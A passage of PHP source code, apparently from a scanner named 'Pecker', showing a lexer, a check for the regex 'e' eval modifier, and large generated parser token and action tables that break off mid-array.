$curly_str .= '}'; $curly_num --; } } else { $curly_str .= $token[1]; } if ($curly_num == 0) { $curly = false; $this->report->catchLog($curly_str, 0,$this->parser->getPieceTokenAll($k)); } } elseif($token === '$') { /** * Zend_language_scanner.c : yy56 、yy61 * $nt = $this->parser->getNextToken($k); switch ($nt) { case '$': break; case '\\': break; case '{': break; default: } */ $nt = $this->parser->getVariableToken($k); if ($nt['token'] === '{') { $curly = true; $curly_str = '$'; $curly_num = 0; } } } } /** * get results * @return Ambigous <multitype:, multitype:boolean string multitype: > */ public function getReport() { return $this->report->getReport(); } /** * grep modifier 'e' in regex string * @param string $str * @return boolean */ private function _hasCallback($str) { $str = trim($str); if (substr($str,0,1) == '$') { return true; } $a = subStr(subStr($str,1),0,-1); $start_delimiter = $end_delimiter = $a{0}; $strabc = '([{< )]}>'; if (false !== ($num = strpos($strabc,$start_delimiter))) { $end_delimiter = $strabc{$num+5}; } if (false !== ($num1 = strrpos($str,$end_delimiter))) { $modifiers = substr($str,$num1+1); if (false !== strpos($modifiers,'e')) { return true; } } return false; } } class Pecker_Lexer { protected $code; protected $tokens; protected $pos; protected $line; protected $errMsg; protected $dropTokens; public function __construct() { $this->tokenMap = $this->createTokenMap(); // map of tokens to drop while lexing (the map is only used for isset lookup, // that's why the value is simply set to 1; the value is never actually used.) $this->dropTokens = array_fill_keys(array(T_WHITESPACE, T_OPEN_TAG), 1); } /** * Initializes the lexer for lexing the provided source code. * * @param string $code The source code to lex * * @throws PHPParser_Error on lexing errors (unterminated comment or unexpected character) */ public function startLexing($code) { if (preg_match('/<\?(php)?\s*@Zend;[\r\n|\n]+\d+;/', $code)) { $this->errMsg = 'Encrypt with Zend optimizer.'; return false; } $this->resetErrors(); $this->tokens = token_get_all($code); $this->code = $code; $this->pos = -1; $this->line = 1; return $this->checkError(); } protected function resetErrors() { // clear error_get_last() by forcing an undefined variable error @$undefinedVariable; } protected function checkError() { $error = error_get_last(); if (preg_match('~^Unterminated comment starting line ([0-9]+)$~',$error['message'], $matches)) { $this->errMsg = 'Unterminated comment at line '.$matches[1]; return false; } if (preg_match('~^Unexpected character in input: \'(.)\' \(ASCII=([0-9]+)\)~s',$error['message'], $matches)) { $this->errMsg = sprintf('Unexpected character "%s" (ASCII %d)', $matches[1], $matches[2]); return false; } // PHP cuts error message after null byte, so need special case if (preg_match('~^Unexpected character in input: \'$~', $error['message'])) { return false; } //@todo 对其他类型语法错误检测 return true; } public function getError() { return $this->errMsg; } /** * Fetches the next token. * * @param mixed $value Variable to store token content in * @param mixed $startAttributes Variable to store start attributes in * @param mixed $endAttributes Variable to store end attributes in * * @return int Token id */ public function getNextToken(&$value = null, &$startAttributes = null, &$endAttributes = null) { $startAttributes = array(); $endAttributes = array(); while (isset($this->tokens[++$this->pos])) { $token = $this->tokens[$this->pos]; if (is_string($token)) { $startAttributes['startLine'] = $this->line; $endAttributes['endLine'] = $this->line; // bug in token_get_all if ('b"' === $token) { $value = 'b"'; return ord('"'); } else { $value = $token; return ord($token); } } else { $this->line += substr_count($token[1], "\n"); if (T_COMMENT === $token[0]) { // $startAttributes['comments'][] = new PHPParser_Comment($token[1], $token[2]); } elseif (T_DOC_COMMENT === $token[0]) { // $startAttributes['comments'][] = new PHPParser_Comment_Doc($token[1], $token[2]); } elseif (!isset($this->dropTokens[$token[0]])) { $value = $token[1]; $startAttributes['startLine'] = $token[2]; $endAttributes['endLine'] = $this->line; return $this->tokenMap[$token[0]]; } } } $startAttributes['startLine'] = $this->line; // 0 is the EOF token return 0; } /** * Creates the token map. * * The token map maps the PHP internal token identifiers * to the identifiers used by the Parser. Additionally it * maps T_OPEN_TAG_WITH_ECHO to T_ECHO and T_CLOSE_TAG to ';'. * * @return array The token map */ protected function createTokenMap() { $tokenMap = array(); // 256 is the minimum possible token number, as everything below // it is an ASCII value for ($i = 256; $i < 1000; ++$i) { // T_DOUBLE_COLON is equivalent to T_PAAMAYIM_NEKUDOTAYIM if (T_DOUBLE_COLON === $i) { $tokenMap[$i] = Pecker_Parser::T_PAAMAYIM_NEKUDOTAYIM; // T_OPEN_TAG_WITH_ECHO with dropped T_OPEN_TAG results in T_ECHO } elseif(T_OPEN_TAG_WITH_ECHO === $i) { $tokenMap[$i] = Pecker_Parser::T_ECHO; // T_CLOSE_TAG is equivalent to ';' } elseif(T_CLOSE_TAG === $i) { $tokenMap[$i] = ord(';'); // and the others can be mapped directly } elseif ('UNKNOWN' !== ($name = token_name($i)) && defined($name = 'Pecker_Parser::' . $name) ) { $tokenMap[$i] = constant($name); } } return $tokenMap; } public function getTokens() { return $this->tokens; } } class Pecker_Parser { const TOKEN_NONE = -1; const TOKEN_INVALID = 151; const TOKEN_MAP_SIZE = 386; const YYLAST = 1008; const YY2TBLSTATE = 316; const YYGLAST = 444; const YYNLSTATES = 531; const YYUNEXPECTED = 32767; const YYDEFAULT = -32766; // {{{ Tokens const YYERRTOK = 256; const T_INCLUDE = 257; const T_INCLUDE_ONCE = 258; const T_EVAL = 259; const T_REQUIRE = 260; const T_REQUIRE_ONCE = 261; const T_LOGICAL_OR = 262; const T_LOGICAL_XOR = 263; const T_LOGICAL_AND = 264; const T_PRINT = 265; const T_YIELD = 266; const T_PLUS_EQUAL = 267; const T_MINUS_EQUAL = 268; const T_MUL_EQUAL = 269; const T_DIV_EQUAL = 270; const T_CONCAT_EQUAL = 271; const T_MOD_EQUAL = 272; const T_AND_EQUAL = 273; const T_OR_EQUAL = 274; const T_XOR_EQUAL = 275; const T_SL_EQUAL = 276; const T_SR_EQUAL = 277; const T_BOOLEAN_OR = 278; const T_BOOLEAN_AND = 279; const T_IS_EQUAL = 280; const T_IS_NOT_EQUAL = 281; const T_IS_IDENTICAL = 282; const T_IS_NOT_IDENTICAL = 283; const T_IS_SMALLER_OR_EQUAL = 284; const T_IS_GREATER_OR_EQUAL = 285; const T_SL = 286; const T_SR = 287; const T_INSTANCEOF = 288; const T_INC = 289; const T_DEC = 290; const T_INT_CAST = 291; const T_DOUBLE_CAST = 292; const T_STRING_CAST = 293; const T_ARRAY_CAST = 294; const T_OBJECT_CAST = 295; const T_BOOL_CAST = 296; const T_UNSET_CAST = 297; const T_NEW = 298; const T_CLONE = 299; const T_EXIT = 300; const T_IF = 301; const T_ELSEIF = 302; const T_ELSE = 303; const T_ENDIF = 304; const T_LNUMBER = 305; const T_DNUMBER = 306; const T_STRING = 307; const T_STRING_VARNAME = 308; const T_VARIABLE = 309; const T_NUM_STRING = 310; const T_INLINE_HTML = 311; const T_CHARACTER = 312; const T_BAD_CHARACTER = 313; const T_ENCAPSED_AND_WHITESPACE = 314; const T_CONSTANT_ENCAPSED_STRING = 315; const T_ECHO = 316; const T_DO = 317; const T_WHILE = 318; const T_ENDWHILE = 319; const T_FOR = 320; const T_ENDFOR = 321; const T_FOREACH = 322; const T_ENDFOREACH = 323; const T_DECLARE = 324; const T_ENDDECLARE = 325; const T_AS = 326; const T_SWITCH = 327; const T_ENDSWITCH = 328; const T_CASE = 329; const T_DEFAULT = 330; const T_BREAK = 331; const T_CONTINUE = 332; const T_GOTO = 333; const T_FUNCTION = 334; const T_CONST = 335; const T_RETURN = 336; const T_TRY = 337; const T_CATCH = 338; const T_FINALLY = 339; const T_THROW = 340; const T_USE = 341; const T_INSTEADOF = 342; const T_GLOBAL = 343; const T_STATIC = 344; const T_ABSTRACT = 345; const T_FINAL = 346; const T_PRIVATE = 347; const T_PROTECTED = 348; const T_PUBLIC = 349; const T_VAR = 350; const T_UNSET = 351; const T_ISSET = 352; const T_EMPTY = 353; const T_HALT_COMPILER = 354; const T_CLASS = 355; const T_TRAIT = 356; const T_INTERFACE = 357; const T_EXTENDS = 358; const T_IMPLEMENTS = 359; const T_OBJECT_OPERATOR = 360; const T_DOUBLE_ARROW = 361; const T_LIST = 362; const T_ARRAY = 363; const T_CALLABLE = 364; const T_CLASS_C = 365; const T_TRAIT_C = 366; const T_METHOD_C = 367; const T_FUNC_C = 368; const T_LINE = 369; const T_FILE = 370; const T_COMMENT = 371; const T_DOC_COMMENT = 372; const T_OPEN_TAG = 373; const T_OPEN_TAG_WITH_ECHO = 374; const T_CLOSE_TAG = 375; const T_WHITESPACE = 376; const T_START_HEREDOC = 377; const T_END_HEREDOC = 378; const T_DOLLAR_OPEN_CURLY_BRACES = 379; const T_CURLY_OPEN = 380; const T_PAAMAYIM_NEKUDOTAYIM = 381; const T_NAMESPACE = 382; const T_NS_C = 383; const T_DIR = 384; const T_NS_SEPARATOR = 385; // }}} /* @var array Map of token ids to their respective names */ protected static $terminals = array( "EOF", "error", "T_INCLUDE", "T_INCLUDE_ONCE", "T_EVAL", "T_REQUIRE", "T_REQUIRE_ONCE", "','", "T_LOGICAL_OR", "T_LOGICAL_XOR", "T_LOGICAL_AND", "T_PRINT", "T_YIELD", "'='", "T_PLUS_EQUAL", "T_MINUS_EQUAL", "T_MUL_EQUAL", "T_DIV_EQUAL", "T_CONCAT_EQUAL", "T_MOD_EQUAL", "T_AND_EQUAL", "T_OR_EQUAL", "T_XOR_EQUAL", "T_SL_EQUAL", "T_SR_EQUAL", "'?'", "':'", "T_BOOLEAN_OR", "T_BOOLEAN_AND", "'|'", "'^'", "'&'", "T_IS_EQUAL", "T_IS_NOT_EQUAL", "T_IS_IDENTICAL", "T_IS_NOT_IDENTICAL", "'<'", "T_IS_SMALLER_OR_EQUAL", "'>'", "T_IS_GREATER_OR_EQUAL", "T_SL", "T_SR", "'+'", "'-'", "'.'", "'*'", "'/'", "'%'", "'!'", "T_INSTANCEOF", "'~'", "T_INC", "T_DEC", "T_INT_CAST", "T_DOUBLE_CAST", "T_STRING_CAST", "T_ARRAY_CAST", "T_OBJECT_CAST", "T_BOOL_CAST", "T_UNSET_CAST", "'@'", "'['", "T_NEW", "T_CLONE", "T_EXIT", "T_IF", "T_ELSEIF", "T_ELSE", "T_ENDIF", "T_LNUMBER", "T_DNUMBER", "T_STRING", "T_STRING_VARNAME", "T_VARIABLE", "T_NUM_STRING", "T_INLINE_HTML", "T_ENCAPSED_AND_WHITESPACE", "T_CONSTANT_ENCAPSED_STRING", "T_ECHO", "T_DO", "T_WHILE", "T_ENDWHILE", "T_FOR", "T_ENDFOR", "T_FOREACH", "T_ENDFOREACH", "T_DECLARE", "T_ENDDECLARE", "T_AS", "T_SWITCH", "T_ENDSWITCH", "T_CASE", "T_DEFAULT", "T_BREAK", "T_CONTINUE", "T_GOTO", "T_FUNCTION", "T_CONST", "T_RETURN", "T_TRY", "T_CATCH", "T_FINALLY", "T_THROW", "T_USE", "T_INSTEADOF", "T_GLOBAL", "T_STATIC", "T_ABSTRACT", "T_FINAL", "T_PRIVATE", "T_PROTECTED", "T_PUBLIC", "T_VAR", "T_UNSET", "T_ISSET", "T_EMPTY", "T_HALT_COMPILER", "T_CLASS", "T_TRAIT", "T_INTERFACE", "T_EXTENDS", "T_IMPLEMENTS", "T_OBJECT_OPERATOR", "T_DOUBLE_ARROW", "T_LIST", "T_ARRAY", "T_CALLABLE", "T_CLASS_C", "T_TRAIT_C", "T_METHOD_C", "T_FUNC_C", "T_LINE", "T_FILE", "T_START_HEREDOC", "T_END_HEREDOC", "T_DOLLAR_OPEN_CURLY_BRACES", "T_CURLY_OPEN", "T_PAAMAYIM_NEKUDOTAYIM", "T_NAMESPACE", "T_NS_C", "T_DIR", "T_NS_SEPARATOR", "';'", "'{'", "'}'", "'('", "')'", "'$'", "'`'", "']'", "'\"'" , "???" ); /* @var array Map which translates lexer tokens to internal tokens */ protected static $translate = array( 0, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 48, 150, 151, 147, 47, 31, 151, 145, 146, 45, 42, 7, 43, 44, 46, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 26, 142, 36, 13, 38, 25, 60, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 61, 151, 149, 30, 151, 148, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 143, 29, 144, 50, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 27, 28, 32, 33, 34, 35, 37, 39, 40, 41, 49, 51, 52, 53, 54, 55, 56, 57, 58, 59, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 151, 151, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 151, 151, 151, 151, 151, 151, 133, 134, 135, 136, 137, 138, 139, 140, 141 ); protected static $yyaction = array( 59, 60, 325, 61, 62,-32766,-32766,-32766, 324, 63, 64,-32767,-32767,-32767,-32767, 98, 99, 100, 101, 102, 57, 917,-32766, 298,-32766,-32766, 41, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 267, 346, 65, 66, 927, 249, 929, 928, 67, 535, 68, 220, 221, 69, 70, 71, 72, 73, 74, 75, 76, 31, 232, 77, 318, 326, 730, 732, 462, 836, 837, 362, 348, 895, 238, 578, 280, 363, 46, 27, 327, 859, 364, 246, 365, 454, 366, 39, 223, 328,-32766,-32766, -32766, 36, 37, 367, 333, 360, 38, 368, 329, 423, 78, 848, 122, 278, 279,-32766, 286,-32766, 35, 369, 370, 371, 372, 373, 389, 343, 861, 330, 560, 602, 374, 375, 376, 377, 848, 842, 843, 844, 845, 839, 840, 239, 82, 83, 84, -350, 389, 846, 841, 330, 584, 504, 126, 47, 227, 259, 244, 802, 248, 40, 351, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 788, 233, 576,-32766,-32766,-32766, 701, 702, 703, 700, 699, 698, 630, 0,-32766,-32766,-32766, 655, 656, 216,-32766, 215,-32766,-32766,-32766,-32766,-32766,-32767, -32767,-32767,-32767,-32766, 788, 322, 329, 319, 899, 544, -117, 257, 128, 277,-32766,-32766,-32766, 369, 370, 889, 693, 261, 895, 225, 226,-32766, 540, 602, 374, 375, 675, 535, 344,-32766, 535,-32766, 895, 376,-32766,-32766, -32766, 575,-32766, 53,-32766, 322,-32766, 658, 263,-32766, 187, 257, 600,-32766,-32766,-32766, 788,-32766,-32766,-32766, 693, 34,-32766, 535, 350,-32766, 388,-32766, 860, 812, -32766,-32766,-32766,-32766,-32766, 222,-32766, 54,-32766, 56, 127,-32766, 100, 101, 102,-32766,-32766,-32766, 788, 22, -32766,-32766, 601, 268,-32766, 924, 259,-32766, 388, 666, 631, 389,-32766,-32766, 330,-32766, 322, 224, 334,-32766, 259, 917, 257, 503, 861, 535, 103, 104, 105,-32766, 233, 693,-32766,-32766,-32766, 118,-32766, 494,-32766, 340, -32766, 506, 902,-32766,-32766,-32766, 126,-32766,-32766,-32766, 345,-32766,-32766,-32766, 213, 123,-32766, 535, 130,-32766, 388,-32766, 452, 599,-32766,-32766,-32766,-32766,-32766, 119, -32766, 120,-32766, 788, 233,-32766, 189, -113, 190,-32766, -32766,-32766, 194, 217,-32766,-32766, 195, 125,-32766,-32766, -32766,-32766, 388, 188, 685, 858,-32766,-32766, 117,-32766, 329, 319, 353, 28, 509, 788, 597, 277, 357, 468, 680, 369, 370, 516,-32766,-32766,-32766, 131, 287, 49, 540, 602, 374, 375, 477, 478,-32766, 520,-32766,-32766, 528,-32766, 535,-32766,-32766,-32766,-32766, 655, 656,-32766, -32766,-32766, 263,-32766, 519,-32766, 507,-32766, 542, 129, -32766, 679, 525, 588,-32766,-32766,-32766, 526,-32766,-32766, -32766, 690, 530,-32766, 535, 306,-32766, 388,-32766, 541, 511,-32766,-32766,-32766,-32766,-32766, 224,-32766, 50,-32766, 58, 482,-32766, 55, 805, 51,-32766,-32766,-32766, 788, 52,-32766,-32766, 416, 232,-32766, 502, 687,-32766, 388, 445, 491, 229,-32766,-32766, 551,-32766, 922, 549, 415, -32766, 339, 341, 535, 536, 399, 535, 400, 402, 414, -32766, -158, 401,-32766,-32766,-32766, 493,-32766, 479,-32766, 475,-32766, -161, 604,-32766,-32766,-32766, 265,-32766,-32766, -32766, 788,-32766,-32766,-32766, 266, 917,-32766, 535, 256, -32766, 388,-32766, 342, 212,-32766,-32766,-32766,-32766,-32766, 338,-32766, 471,-32766, 457, 473,-32766, 359, 603, 258, -32766,-32766,-32766, 788, 255,-32766,-32766, 577, 260,-32766, 376, 579,-32766, 388, 847, 247, 0,-32766,-32766, -350, -32766, 657, 0, 337,-32766, 0, 0, -351, 245, 0, 535, 121, 193, 42,-32766, -282, 791,-32766,-32766,-32766, 0,-32766, 0,-32766, 0,-32766, 0, 0,-32766, 570, -32766, -290,-32766,-32766,-32766, 788,-32766,-32766,-32766, -291, 499,-32766, 535, 300,-32766, 388,-32766, 288, 251,-32766, -32766,-32766,-32766,-32766, 242,-32766, 407,-32766, 684, 340, -32766, 686, 614, 616,-32766,-32766,-32766, 618, 563,-32766, -32766, 625, 624,-32766, 633, 580,-32766, 388, 565, 587, 574, 572,-32766, 513,-32766, 512, 45, 44,-32766, 569, 571, 573, 586, 545, 535, 683, 676, 234,-32766, 510, 515,-32766,-32766,-32766, 517,-32766, 522,-32766, 81,-32766, 124, 523,-32766,-32766,-32766, 524,-32766,-32766,-32766, 527, -32766,-32766,-32766, 505, 529,-32766, 535, 890,-32766, 388, -32766, 900, 668,-32766,-32766,-32766,-32766,-32766, 827,-32766, 892,-32766, 880, 894,-32766, 191, 192, 896,-32766,-32766, -32766, 923, 356,-32766,-32766, 623, 926,-32766, 622, 925, -32766, 388, 32, 33, 185, 568,-32766, 321,-32766, 317, 43, 262, 836, 837, 237,-32766,-32766, 236, 48,-32766, 838, 535, 235, 30, 219,-32766, 218, 214,-32766,-32766, -32766, 186,-32766, 80,-32766, 79,-32766,-32766,-32766,-32766, 768, 829, 767,-32766,-32766,-32766, 446, -114,-32766,-32766, 854, 659,-32766, 795, 792,-32766, 388, 498, 472, 437, 358, 354, 307,-32766, 289, 25, 24, 23, 442, -113, 842, 843, 844, 845, 839, 840, 309, 786, 0, 480, 874, 855, 846, 841, 329, 319, 921, 826,-32766, 329, -32766, 277,-32766,-32766, 891, 369, 370,-32766,-32766,-32766, 369, 370, 875, 879, 540, 602, 374, 375, 893, 560, 602, 374, 375, 329,-32766, 811,-32766,-32766,-32766,-32766, -32766, 799, 797, 798, 369, 370, 263, 329, 796, 0, 0, 329, 543, 560, 602, 374, 375, 598, 369, 370, 0, 0, 369, 370, 329, 0, 0, 560, 602, 374, 375, 560, 602, 374, 375, 369, 370, 0, 0, 0, 329, 691, 0, 0, 560, 602, 374, 375, 0, 0, 0, 369, 370, 329, 0, 790, 0, 329, 501, 591, 560, 602, 374, 375, 369, 370, 0, 0, 369, 370, 0, 329, 593, 560, 602, 374, 375, 560, 602, 374, 375, 0, 369, 370, 492, 0, 0, 0, 514, 0, 486, 560, 602, 374, 375, 329, 0, 0, 0, 329, 0, 561, 0, 0, 0, 789, 369, 370, 0, 0, 369, 370,-32766,-32766,-32766, 560, 602, 374, 375, 560, 602, 374, 375, 0, 329, 0, 0, 0, 0,-32766, 0,-32766,-32766,-32766,-32766, 369, 370, 0, 0, 0, 0, 0, 0, 0, 560, 602, 374, 375 ); protected static $yycheck = array( 2, 3, 4, 5, 6, 8, 9, 10, 7, 11, 12, 36, 37, 38, 39, 40, 41, 42, 43, 44, 61, 76, 25, 73, 27, 28, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 61, 7, 42, 43, 71, 76, 73, 74, 48, 71, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 51, 52, 76, 69, 70, 71, 71, 73, 7, 75, 7, 77, 78, 79, 80, 134, 82, 122, 84, 81, 86, 135, 136, 89, 8, 9, 10, 93, 94, 95, 96, 7, 98, 99, 96, 122, 102, 134, 143, 105, 106, 25, 7, 27, 7, 107, 108, 113, 114, 115, 138, 26, 117, 141, 116, 117, 118, 119, 124, 125, 134, 127, 128, 129, 130, 131, 132, 133, 8, 9, 10, 122, 138, 139, 140, 141, 142, 143, 143, 145, 31, 147, 148, 146, 150, 25, 7, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 12, 49, 142, 8, 9, 10, 106, 107, 108, 109, 110, 111, 26, 0, 8, 9, 10, 125, 126, 31, 25, 7, 27, 28, 29, 30, 31, 32, 33, 34, 35, 25, 12, 97, 96, 97, 71, 142, 146, 103, 61, 103, 8, 9, 10, 107, 108, 73, 112, 7, 73, 31, 7, 65, 116, 117, 118, 119, 142, 71, 143, 8, 71, 75, 73, 124, 78, 79, 80, 142, 82, 61, 84, 97, 86, 146, 138, 89, 7, 103, 144, 93, 94, 95, 12, 65, 98, 99, 112, 7, 102, 71, 71, 105, 106, 75, 71, 106, 78, 79, 80, 113, 82, 31, 84, 61, 86, 61, 143, 89, 42, 43, 44, 93, 94, 95, 12, 146, 98, 99, 144, 147, 102, 144, 147, 105, 106, 73, 142, 138, 142, 143, 141, 113, 97, 31, 145, 65, 147, 76, 103, 71, 117, 71, 45, 46, 47, 75, 49, 112, 78, 79, 80, 143, 82, 71, 84, 141, 86, 143, 146, 89, 142, 143, 143, 93, 94, 95, 7, 65, 98, 99, 123, 7, 102, 71, 143, 105, 106, 75, 147, 144, 78, 79, 80, 113, 82, 143, 84, 143, 86, 12, 49, 89, 13, 146, 13, 93, 94, 95, 13, 147, 98, 99, 13, 26, 102, 8, 9, 105, 106, 13, 142, 150, 142, 143, 13, 113, 96, 97, 66, 67, 26, 12, 31, 103, 66, 67, 144, 107, 108, 26, 8, 9, 10, 91, 92, 61, 116, 117, 118, 119, 100, 101, 65, 26, 142, 143, 26, 25, 71, 27, 28, 29, 75, 125, 126, 78, 79, 80, 138, 82, 26, 84, 26, 86, 144, 26, 89, 142, 143, 26, 93, 94, 95, 26, 65, 98, 99, 142, 143, 102, 71, 72, 105, 106, 75, 142, 143, 78, 79, 80, 113, 82, 31, 84, 61, 86, 61, 68, 89, 61, 73, 61, 93, 94, 95, 12, 61, 98, 99, 88, 62, 102, 71, 71, 105, 106, 88, 71, 88, 142, 143, 71, 113, 71, 71, 71, 65, 71, 71, 71, 71, 71, 71, 71, 71, 71, 75, 88, 73, 78, 79, 80, 73, 82, 73, 84, 73, 86, 73, 117, 89, 142, 143, 76, 93, 94, 95, 12, 65, 98, 99, 76, 76, 102, 71, 121, 105, 106, 75, 80, 88, 78, 79, 80, 113, 82, 96, 84, 90, 86, 90, 103, 89, 96, 117, 104, 93, 94, 95, 12, 120, 98, 99, 142, 120, 102, 124, 142, 105, 106, 134, 122, -1, 142, 143, 122, 113, 146, -1, 141, 65, -1, -1, 122, 122, -1, 71, 123, 123, 123, 75, 137, 146, 78, 79, 80, -1, 82, -1, 84, -1, 86, -1, -1, 89, 142, 143, 137, 93, 94, 95, 12, 65, 98, 99, 137, 137, 102, 71, 137, 105, 106, 75, 137, 137, 78, 79, 80, 113, 82, 137, 84, 141, 86, 142, 141, 89, 142, 142, 142, 93, 94, 95, 142, 142, 98, 99, 142, 142, 102, 142, 142, 105, 106, 142, 142, 142, 142, 143, 142, 113, 142, 142, 142, 65, 142, 142, 142, 142, 142, 71, 142, 142, 145, 75, 143, 143, 78, 79, 80, 143, 82, 143, 84, 143, 86, 143, 143, 89, 142, 143, 143, 93, 94, 95, 143, 65, 98, 99, 143, 143, 102, 71, 144, 105, 106, 75, 144, 144, 78, 79, 80, 113, 82, 144, 84, 144, 86, 144, 144, 89, 42, 43, 144, 93, 94, 95, 144, 144, 98, 99, 144, 144, 102, 144, 144, 105, 106, 145, 145, 61, 142, 143, 145, 113, 145, 145, 145, 69, 70, 145, 65, 73, 145, 145, 145, 77, 71, 145, 145, 145, 75, 145, 145, 78, 79, 80, 145, 82, 145, 84, 145, 86, 142, 143, 89, 146, 146, 146, 93, 94, 95, 146, 146, 98, 99, 146, 146, 102, 146, 146, 105, 106, 146, 146, 146, 146, 146, 146, 113, 146, 146, 146, 146, 125, 146, 127, 128, 129, 130, 131, 132, 133, 148, -1, 149, 149, 149, 139, 140, 96, 97, 149, 149, 145, 96, 147, 103, 142, 143, 149, 107, 108, 8, 9, 10, 107, 108, 149, 149, 116, 117, 118, 119, 149, 116, 117, 118, 119, 96, 25, 149, 27, 28, 29, 30, 31, 149, 149, 149, 107, 108, 138, 96, 149, -1, -1, 96, 144, 116, 117, 118, 119, 144, 107, 108, -1, -1, 107, 108, 96, -1, -1, 116, 117, 118, 119, 116, 117, 118, 119, 107, 108, -1, -1, -1, 96, 144, -1, -1, 116, 117, 118, 119, -1, -1, -1, 107, 108, 96, -1, 144, -1, 96, 83, 144, 116, 117, 118, 119, 107, 108, -1, -1, 107, 108, -1, 96, 144, 116, 117, 118, 119, 116, 117, 118, 119, -1, 107, 108, 85, -1, -1, -1, 144, -1, 87, 116, 117, 118, 119, 96, -1, -1, -1, 96, -1, 144, -1, -1, -1, 144, 107, 108, -1, -1, 107, 108, 8, 9, 10, 116, 117, 118, 119, 116, 117, 118, 119, -1, 96, -1, -1, -1, -1, 25, -1, 27, 28, 29, 30, 107, 108, -1, -1, -1, -1, -1, -1, -1, 116, 117, 118, 119 ); protected static $yybase = array( 0, 728, 294, 110, 817, 804, 2, 863, 859, 733, 821, 788, 771, 835, 775, 757, 888, 888, 888, 888, 888, 368, 377, 391, 394, 391, 410, -2, -2, -2, 435, 244, 244, 635, 244, 276, 603, 467, 519, 383, 351, 160, 192, 551, 551, 551, 551, 690, 690, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 158, 429, 468, 470, 527, 528, 529, 530, 450, 456, 634, 587, 583, 413, 579, 578, 576, 574, 568, 588, 567, 670, 563, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 225, 371, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 178, 178, 80, 683, 683, 683, 683, 683, 683, 683, 683, 683, 683, 683, -3, 396, 964, 829, 167, 167, 167, 167, 13, -25, -25, -25, -25, 148, 108, 209, 113, 113, 446, 446, 422, 547, 163, 163, 163, 163, 163, 163, 163, 163, 163, 163, 449, 415, 240, 240, 614, 614, 64, 64, 64, 64, 302, -33, -55, 235, -1, 256, 451, 137, 137, 137, 459, 440, 460, 193, 271, 271, 271, -24, -24, -24, -24, 545, -24, -24, -24, 188, 216, -50, -50, -29, 205, 464, 594, 462, 591, 299, 482, -41, 317, 442, 226, 454, 442, 326, 332, 314, 458, 89, 226, 158, 197, 309, 218, 425, 428, 531, 395, 67, 99, 32, -23, 182, 146, 143, 402, 640, 636, 186, 151, 465, 101, -10, 182, 221, 534, 88, 1, 533, 242, 365, 598, 436, 618, 438, 436, 445, 365, 613, 613, 613, 613, 365, 432, 618, 618, 365, 422, 618, 254, 432, 365, 444, 432, 448, 613, 523, 521, 436, 439, 418, 618, 618, 618, 438, 365, 613, 452, 243, 618, 613, 452, 365, 445, 185, 417, 348, 605, 630, 602, 434, 560, 441, 406, 621, 619, 628, 437, 430, 622, 597, 495, 518, 431, 375, 407, 414, 419, 497, 412, 466, 454, 498, 315, 457, 491, 457, 719, 486, 474, 453, 463, 517, 370, 353, 536, 495, 648, 656, 669, 433, 532, 653, 457, 714, 525, 338, 355, 617, 427, 457, 612, 457, 537, 457, 647, 426, 592, 495, 315, 315, 315, 645, 713, 712, 706, 699, 694, 693, 685, 409, 678, 516, 655, 65, 626, 458, 490, 424, 513, 214, 677, 457, 457, 541, 545, 457, 512, 524, 661, 510, 652, 447, 469, 672, 440, 654, 457, 461, 671, 214, 408, 403, 641, 509, 543, 604, 548, 359, 644, 606, 552, 363, 595, 421, 506, 660, 659, 663, 505, 556, 420, 401, 443, 609, 501, 651, 423, 483, 455, 404, 561, 416, 658, 500, 499, 496, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 